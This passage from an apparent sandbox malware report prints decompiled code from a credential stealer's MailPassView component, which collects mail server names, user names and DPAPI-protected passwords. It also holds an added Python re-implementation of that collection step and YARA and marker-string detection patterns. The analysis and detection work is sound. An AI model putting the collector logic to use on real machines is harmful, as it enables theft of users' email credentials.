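        return b"".join(k.encode("ascii") + b"\x00" for k in keys)
    return (b"\x90" * 64 + b"\x00" + table(REGISTRY_MAIL_KEYS)
            + b"\x00" * 32 + b"MySMTPServerPort\x00"
            + table(INI_MAIL_KEYS) + b"\x00" * 16)


if __name__ == "__main__":
    for hit in scan_dump(build_demo_dump()).values():
        print(f"{hit.name}: {len(hit.found)} hit(s), coverage {hit.coverage:.0%},"
              f" span {hit.span}, missing {hit.missing}")
    print(yara_rule("mail_credential_regvalues", REGISTRY_MAIL_KEYS, 8))
```

Run it against the .sdmp files listed under Memory Dump Source (read the file as bytes and pass it to scan_dump) rather than the packed sample on disk: the report flags the sample as unpacking itself and hollowing a process, so the string tables only exist in the unpacked image. The NUL-boundary check matters for the same reason the report's "String ID" lists names rather than substrings: bare substring matches on words like "PopPort" hit legitimate mail clients too.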

                                                                                                                                                    C-Code - Quality: 99%
                                                                                                                                                    			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				void* _v11;
                                                                                                                                                    				char _v12;
                                                                                                                                                    				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
                                                                                                                                                    				_v208 = "acirc;";
                                                                                                                                                    				_v204 = "atilde;";
                                                                                                                                                    				_t200 = _a8;
                                                                                                                                                    				_v28 = _v28 | 0xffffffff;
                                                                                                                                                    				_t231 = 0;
                                                                                                                                                    				_t254 = 0;
                                                                                                                                                    				_v200 = "auml;";
                                                                                                                                                    				_v196 = "aring;";
                                                                                                                                                    				_v192 = "aelig;";
                                                                                                                                                    				_v188 = "ccedil;";
                                                                                                                                                    				_v184 = "egrave;";
                                                                                                                                                    				_v180 = "eacute;";
                                                                                                                                                    				_v176 = "ecirc;";
                                                                                                                                                    				_v172 = "euml;";
                                                                                                                                                    				_v168 = "igrave;";
                                                                                                                                                    				_v164 = "iacute;";
                                                                                                                                                    				_v160 = "icirc;";
                                                                                                                                                    				_v156 = "iuml;";
                                                                                                                                                    				_v152 = "eth;";
                                                                                                                                                    				_v148 = "ntilde;";
                                                                                                                                                    				_v144 = "ograve;";
                                                                                                                                                    				_v140 = "oacute;";
                                                                                                                                                    				_v136 = "ocirc;";
                                                                                                                                                    				_v132 = "otilde;";
                                                                                                                                                    				_v128 = "ouml;";
                                                                                                                                                    				_v124 = "divide;";
                                                                                                                                                    				_v120 = "oslash;";
                                                                                                                                                    				_v116 = "ugrave;";
                                                                                                                                                    				_v112 = "uacute;";
                                                                                                                                                    				_v108 = "ucirc;";
                                                                                                                                                    				_v104 = "uuml;";
                                                                                                                                                    				_v100 = "yacute;";
                                                                                                                                                    				_v96 = "thorn;";
                                                                                                                                                    				_v92 = "yuml;";
                                                                                                                                                     				if( *_t200 == 0) { // empty input: go straight to L45, which writes the terminator
                                                                                                                                                    					L45:
                                                                                                                                                    					_t202 = _a4 + _t231;
                                                                                                                                                    					 *_t202 = 0;
                                                                                                                                                    					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                                                                                                                    						return _t202;
                                                                                                                                                    					} else {
                                                                                                                                                    						 *((char*)(_t202 - 1)) = 0;
                                                                                                                                                    						return _t202;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                     				while(_a12 == 0xffffffff || _a12 > _t254) { // _a12: input length limit (-1 = unbounded); _t254 indexes the input (_a8), _t231 the output (_a4), with no bound on the output buffer
                                                                                                                                                    					_t232 = _t254 + _t200;
                                                                                                                                                    					_t203 =  *_t232;
                                                                                                                                                    					_v13 = _t203;
                                                                                                                                                     					if(_t203 != 0x26) { // 0x26 == '&': any other byte is handled at L33 (copied, or folded if it is whitespace)
                                                                                                                                                    						L33:
                                                                                                                                                     						if(_a16 == 0 || _t203 > 0x20) { // _a16: collapse a run of bytes <= 0x20 into a single space; _a20: additionally drop a leading and a trailing space
                                                                                                                                                    							 *((char*)(_t231 + _a4)) = _t203;
                                                                                                                                                    							_t231 = _t231 + 1;
                                                                                                                                                    						} else {
                                                                                                                                                    							if(_t231 != _v28) {
                                                                                                                                                    								 *((char*)(_t231 + _a4)) = 0x20;
                                                                                                                                                    								_t231 = _t231 + 1;
                                                                                                                                                    								if(_a20 != 0 && _t231 == 1) {
                                                                                                                                                    									_t231 = 0;
                                                                                                                                                    								}
                                                                                                                                                    							}
                                                                                                                                                    							_v28 = _t231;
                                                                                                                                                    						}
                                                                                                                                                    						_t254 = _t254 + 1;
                                                                                                                                                    						L43:
                                                                                                                                                    						_t200 = _a8;
                                                                                                                                                    						if( *((char*)(_t254 + _t200)) != 0) {
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    						break;
                                                                                                                                                    					}
                                                                                                                                                    					_t249 = 0;
                                                                                                                                                    					_v36 = _t232 + 1;
                                                                                                                                                    					while(1) {
                                                                                                                                                     						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c)); // first pass: six short entity names in the table at _t255 - 0x3c, each mapped to one byte at _t255 - 0x14
                                                                                                                                                    						_v8 = _t205;
                                                                                                                                                    						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
                                                                                                                                                    						_t256 = _t256 + 0x10;
                                                                                                                                                    						if(_t206 == 0) {
                                                                                                                                                    							break;
                                                                                                                                                    						}
                                                                                                                                                    						_t249 = _t249 + 1;
                                                                                                                                                    						if(_t249 < 6) {
                                                                                                                                                    							continue;
                                                                                                                                                    						}
                                                                                                                                                    						_t209 = _a8;
                                                                                                                                                     						if( *((char*)(_t254 + _t209 + 1)) != 0x23) { // 0x23 == '#': numeric character reference; otherwise fall back to the named Latin-1 table at L29
                                                                                                                                                    							L29:
                                                                                                                                                    							_v8 = _v8 & 0x00000000;
                                                                                                                                                    							while(1) {
                                                                                                                                                     								_t211 =  *(_t255 + _v8 * 4 - 0x1d0); // second pass: the 95 Latin-1 entity names (iexcl; .. yuml;) initialised above, in code-point order
                                                                                                                                                    								_v40 = _t211;
                                                                                                                                                    								_t250 = strlen(_t211);
                                                                                                                                                    								_t213 = strncmp(_v36, _v40, _t250);
                                                                                                                                                    								_t256 = _t256 + 0x10;
                                                                                                                                                    								if(_t213 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_v8 = _v8 + 1;
                                                                                                                                                    								if(_v8 < 0x5f) {
                                                                                                                                                    									continue;
                                                                                                                                                    								}
                                                                                                                                                    								_t203 = _v13;
                                                                                                                                                    								goto L33;
                                                                                                                                                    							}
                                                                                                                                                     							 *((char*)(_t231 + _a4)) = _v8 - 0x5f; // index - 0x5f == 0xa1 + index as a byte: the Latin-1 code of the matched entity
                                                                                                                                                    							_t231 = _t231 + 1;
                                                                                                                                                    							_t254 = _t254 + _t250 + 1;
                                                                                                                                                    							goto L43;
                                                                                                                                                    						}
                                                                                                                                                    						_t128 = _t209 + 2; // 0x2
                                                                                                                                                    						_t251 = _t254 + _t128;
                                                                                                                                                    						_t237 =  *_t251;
                                                                                                                                                     						if(_t237 == 0x78 || _t237 == 0x58) { // 'x' or 'X': hexadecimal form, at most three digits before ';'
                                                                                                                                                    							_t159 = _t209 + 3; // 0x3
                                                                                                                                                    							_t245 = _t254 + _t159;
                                                                                                                                                    							_t238 = _t245;
                                                                                                                                                    							_t252 = 0;
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t216 =  *_t238;
                                                                                                                                                    								if(_t216 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                     								if(_t216 == 0x3b) { // 0x3b == ';'
                                                                                                                                                    									L27:
                                                                                                                                                    									if(_t252 <= 0) {
                                                                                                                                                    										goto L29;
                                                                                                                                                    									}
                                                                                                                                                    									memcpy( &_v88, _t245, _t252);
                                                                                                                                                    									 *((char*)(_t255 + _t252 - 0x54)) = 0;
                                                                                                                                                    									_t220 = E00406512( &_v88);
                                                                                                                                                    									_t256 = _t256 + 0x10;
                                                                                                                                                    									 *((char*)(_t231 + _a4)) = _t220;
                                                                                                                                                    									_t231 = _t231 + 1;
                                                                                                                                                    									_t254 = _t254 + _t252 + 4;
                                                                                                                                                    									goto L43;
                                                                                                                                                    								}
                                                                                                                                                    								_t252 = _t252 + 1;
                                                                                                                                                    								if(_t252 >= 4) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_t238 = _t238 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							_t252 = _t252 | 0xffffffff;
                                                                                                                                                    							goto L27;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t240 = _t251;
                                                                                                                                                    							_t246 = 0;
                                                                                                                                                    							while(1) {
                                                                                                                                                    								_t221 =  *_t240;
                                                                                                                                                    								if(_t221 == 0) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								if(_t221 == 0x3b) {
                                                                                                                                                    									_v8 = _t246;
                                                                                                                                                    									L18:
                                                                                                                                                    									if(_v8 <= 0) {
                                                                                                                                                    										goto L29;
                                                                                                                                                    									}
                                                                                                                                                    									memcpy( &_v76, _t251, _v8);
                                                                                                                                                    									 *((char*)(_t255 + _v8 - 0x48)) = 0;
                                                                                                                                                    									_t226 = atoi( &_v76);
                                                                                                                                                    									_t256 = _t256 + 0x10;
                                                                                                                                                    									_v32 = _t226;
                                                                                                                                                    									_v12 = 0;
                                                                                                                                                    									asm("stosb");
                                                                                                                                                    									_v30 = 0;
                                                                                                                                                     									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0); // decimal value -> 16-bit wide char -> one byte in the system ANSI code page (CP_ACP)
                                                                                                                                                    									 *((char*)(_t231 + _a4)) = _v12;
                                                                                                                                                    									_t231 = _t231 + 1;
                                                                                                                                                    									_t254 = _t254 + _v8 + 3;
                                                                                                                                                    									goto L43;
                                                                                                                                                    								}
                                                                                                                                                    								_t246 = _t246 + 1;
                                                                                                                                                    								if(_t246 >= 6) {
                                                                                                                                                    									break;
                                                                                                                                                    								}
                                                                                                                                                    								_t240 = _t240 + 1;
                                                                                                                                                    							}
                                                                                                                                                    							_v8 = _v8 | 0xffffffff;
                                                                                                                                                    							goto L18;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
                                                                                                                                                    					_t231 = _t231 + 1;
                                                                                                                                                    					_t254 = _t254 + _v8 + 1;
                                                                                                                                                    					goto L43;
                                                                                                                                                    				}
                                                                                                                                                    				goto L45;
                                                                                                                                                    			}



















































































































































                                                                                                                                                    0x0040fd26
                                                                                                                                                    0x0040fd2a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd1d
                                                                                                                                                    0x0040fd2f
                                                                                                                                                    0x0040fd31
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd39
                                                                                                                                                    0x0040fd42
                                                                                                                                                    0x0040fd47
                                                                                                                                                    0x0040fd4f
                                                                                                                                                    0x0040fd52
                                                                                                                                                    0x0040fd55
                                                                                                                                                    0x0040fd56
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd56
                                                                                                                                                    0x0040fd1f
                                                                                                                                                    0x0040fd23
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd25
                                                                                                                                                    0x0040fd25
                                                                                                                                                    0x0040fd2c
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc6f
                                                                                                                                                    0x0040fc6f
                                                                                                                                                    0x0040fc71
                                                                                                                                                    0x0040fc97
                                                                                                                                                    0x0040fc97
                                                                                                                                                    0x0040fc9b
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc8e
                                                                                                                                                    0x0040fd0c
                                                                                                                                                    0x0040fca1
                                                                                                                                                    0x0040fca5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fcb3
                                                                                                                                                    0x0040fcbb
                                                                                                                                                    0x0040fcc4
                                                                                                                                                    0x0040fcc9
                                                                                                                                                    0x0040fcd4
                                                                                                                                                    0x0040fce3
                                                                                                                                                    0x0040fceb
                                                                                                                                                    0x0040fcec
                                                                                                                                                    0x0040fcf0
                                                                                                                                                    0x0040fcfc
                                                                                                                                                    0x0040fd02
                                                                                                                                                    0x0040fd03
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fd03
                                                                                                                                                    0x0040fc90
                                                                                                                                                    0x0040fc94
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc96
                                                                                                                                                    0x0040fc96
                                                                                                                                                    0x0040fc9d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc9d
                                                                                                                                                    0x0040fc60
                                                                                                                                                    0x0040fc7c
                                                                                                                                                    0x0040fc82
                                                                                                                                                    0x0040fc83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040fc83
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • strlen.MSVCRT ref: 0040FC27
                                                                                                                                                    • strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
                                                                                                                                                    • memcpy.MSVCRT ref: 0040FCB3
                                                                                                                                                    • atoi.MSVCRT ref: 0040FCC4
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                    • API String ID: 1895597112-3210201812
                                                                                                                                                    • Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                                                                                    • Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
                                                                                                                                                    • Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
                                                                                                                                                    • Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E004106BE(void* __ecx, void* __edx) {
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				int _t58;
                                                                                                                                                    				int _t59;
                                                                                                                                                    				int _t60;
                                                                                                                                                    				int _t61;
                                                                                                                                                    				int _t63;
                                                                                                                                                    				void* _t96;
                                                                                                                                                    				void* _t99;
                                                                                                                                                    				void* _t102;
                                                                                                                                                    				void* _t105;
                                                                                                                                                    				void* _t108;
                                                                                                                                                    				void* _t111;
                                                                                                                                                    				void* _t114;
                                                                                                                                                    				void* _t117;
                                                                                                                                                    				void* _t123;
                                                                                                                                                    				void* _t194;
                                                                                                                                                    				void* _t196;
                                                                                                                                                    				void* _t201;
                                                                                                                                                    				char* _t202;
                                                                                                                                                    
                                                                                                                                                    				_t194 = __edx;
                                                                                                                                                    				_t201 = __ecx;
                                                                                                                                                    				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
                                                                                                                                                    					_t204 = _t201 + 0x460;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
                                                                                                                                                    					_t123 = E00406B74( *_t204);
                                                                                                                                                    					_t195 = _t201 + 0xf84;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0xf84, _t123);
                                                                                                                                                    				}
                                                                                                                                                    				_t202 = _t201 + 0x46c;
                                                                                                                                                    				if(strcmp(_t202, "POP3_Server") == 0) {
                                                                                                                                                    					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                    					_t195 = _t201 + 0x970;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0x970, _t117);
                                                                                                                                                    				}
                                                                                                                                                    				if(strcmp(_t202, "IMAP_Server") == 0) {
                                                                                                                                                    					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                    					_t195 = _t201 + 0x970;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0x970, _t114);
                                                                                                                                                    				}
                                                                                                                                                    				if(strcmp(_t202, "NNTP_Server") == 0) {
                                                                                                                                                    					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                    					_t195 = _t201 + 0x970;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0x970, _t111);
                                                                                                                                                    				}
                                                                                                                                                    				if(strcmp(_t202, "SMTP_Server") == 0) {
                                                                                                                                                    					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                    					_t195 = _t201 + 0x1084;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0x1084, _t108);
                                                                                                                                                    				}
                                                                                                                                                    				if(strcmp(_t202, "POP3_User_Name") == 0) {
                                                                                                                                                    					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                    					_t195 = _t201 + 0xb70;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0xb70, _t105);
                                                                                                                                                    					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
                                                                                                                                                    				}
                                                                                                                                                    				if(strcmp(_t202, "IMAP_User_Name") == 0) {
                                                                                                                                                    					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
                                                                                                                                                    					_t195 = _t201 + 0xb70;
                                                                                                                                                    					E004060D0(0xff, _t201 + 0xb70, _t102);
                                                                                                                                                    					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
                                                                                                                                                    				}
                                                                                                                                                    				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}
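The decompiled function above is the account-settings collector of the bundled MailPassView component: it compares each setting name against "POP3_User_Name", "SMTP_User_Name", "*_Password2", "*_Email_Address", "*_Port" and "*_Secure_Connection", copies string values with a 0xff-bounded copy into a fixed-offset record, converts the numeric ones, and hands every "*_Password2" value to a separate routine (E00410525). The offsets show the record has one slot for the incoming server (POP3, IMAP and NNTP all write 0x870, 0xb70, 0xf78 and 0xf7c) and one slot for SMTP (0xf84, 0x1284, 0x168c, 0x1690). The script below is an added example, written for this report and not code from the sample or from Joe Sandbox, that re-implements that collection step in readable Python over a constructed account document and, as the defensive counterpart, scans a byte buffer for the same marker strings. The element names match the ones used in Windows Mail / Windows Live Mail .oeaccount files, where a "*_Password2" value is a hex-encoded DPAPI blob; that the DWORD values are written as eight hex digits is an assumption, and the document, server names and blob bytes are constructed. Decryption is deliberately left out: a DPAPI blob can only be unprotected with CryptUnprotectData in the victim's user context, which is exactly why the sample does it on the infected machine.

```python
"""Added example: readable re-implementation of the account-settings
collection seen in the decompiled function, plus a marker-string scanner.
Not part of the sample or of the sandbox report."""
import re
import xml.etree.ElementTree as ET

PROTOCOLS = ("POP3", "IMAP", "NNTP", "SMTP")
STRING_FIELDS = ("Server", "User_Name", "Email_Address")  # 0xff-bounded string copy (E004060D0)
INT_FIELDS = ("Port", "Secure_Connection")                # string-to-int helper (E00406512)
BLOB_FIELD = "Password2"                                  # routed to the separate routine E00410525

# Every blob produced by CryptProtectData starts with version 1 and this provider GUID
# (d08c9ddf-0115-d111-8c7a-00c04fc297eb).
DPAPI_BLOB_PREFIX = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")

# The full set of setting names the decompiled strcmp chain looks for; useful as hunt strings.
MARKER_STRINGS = [f"{p}_{f}" for p in PROTOCOLS
                  for f in STRING_FIELDS + INT_FIELDS + (BLOB_FIELD,)]

# Constructed .oeaccount-style document (names follow the Windows Mail layout; values are fake).
# The Password2 blob is the real DPAPI header followed by padding, not an actual encrypted secret.
SAMPLE_OEACCOUNT = """<MessageAccount>
  <Account_Name type="SZ">Constructed example account</Account_Name>
  <POP3_Server type="SZ">pop.example.test</POP3_Server>
  <POP3_User_Name type="SZ">alice</POP3_User_Name>
  <POP3_Password2 type="BINARY">01000000d08c9ddf0115d1118c7a00c04fc297eb0000000000000000</POP3_Password2>
  <POP3_Port type="DWORD">000003e3</POP3_Port>
  <POP3_Secure_Connection type="DWORD">00000001</POP3_Secure_Connection>
  <SMTP_Server type="SZ">smtp.example.test</SMTP_Server>
  <SMTP_User_Name type="SZ">alice</SMTP_User_Name>
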